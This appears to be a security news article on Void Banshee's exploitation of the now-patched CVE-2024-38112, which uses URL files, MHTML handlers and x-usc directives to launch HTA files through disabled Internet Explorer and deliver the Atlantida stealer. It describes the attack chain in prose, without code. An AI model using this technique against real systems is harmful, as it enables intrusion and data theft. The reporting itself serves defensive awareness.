Hackers focus on legitimate Remote Monitoring and Management (RMM) tools because of their robust and reliable access to systems and networks. This capability enables the extensive and effective distribution of malware throughout an organization’s infrastructure.
Cybersecurity analysts at CheckPoint recently discovered that hackers have been abusing a zero-day flaw in Internet Explorer, targeting Windows users. Furthermore, Trend Micro identified CVE-2024-38112, an MHTML remote code execution vulnerability exploited by the APT group Void Banshee.
**Internet Explorer Zero-Day Vulnerability**
The attack sequence exploits internet shortcuts and Microsoft protocol handlers, such as MHTML, to access disabled Internet Explorer and run malicious code. This vulnerability has been utilized to deploy the Atlantida stealer, which has been active since January 2024, targeting regions like North America, Europe, and Southeast Asia for information theft and financial gain.
**CVE-2024-38112 Zero-Day Campaign (Source: Trend Micro)**
Despite the official end of support and disabling of Internet Explorer, remnants of it linger in modern Windows systems. Void Banshee took advantage of CVE-2024-38112, similar to CVE-2021-40444, by using specially crafted URL files with MHTML protocol handlers and x-usc directives to execute HTA files through the disabled IE process. This technique circumvents IE’s discontinuation, exploiting its historically large attack surface. Microsoft addressed this vulnerability in July 2024 by unregistering the MHTML handler from IE.
Void Banshee exploited CVE-2024-38112 by sending malicious URL files disguised as PDFs to executives and students. The attack sequence includes downloading an HTA file, running VBScript, and utilizing MHTML protocol handlers and x-usc directives to access disabled Internet Explorer. This sequence ends with invoking LoadToBadXml, a .NET Trojan loader, which then injects the Atlantida stealer into RegAsm.exe.
**Atlantida Stealer (Source: Trend Micro)**
The Atlantida stealer gathers extensive confidential data from various applications, browsers, and system locations. It compresses the data into a ZIP file and transmits it through TCP port 6655 to the attacker’s command and control (C&C) server.
Despite Internet Explorer being disabled, attackers exploit its residual presence to install ransomware and other malicious software. Void Banshee serves as an example of an APT group utilizing unpatched services to underscore significant security issues. A prompt response time combined with advanced security solutions is highly recommended for breach resolution and system protection.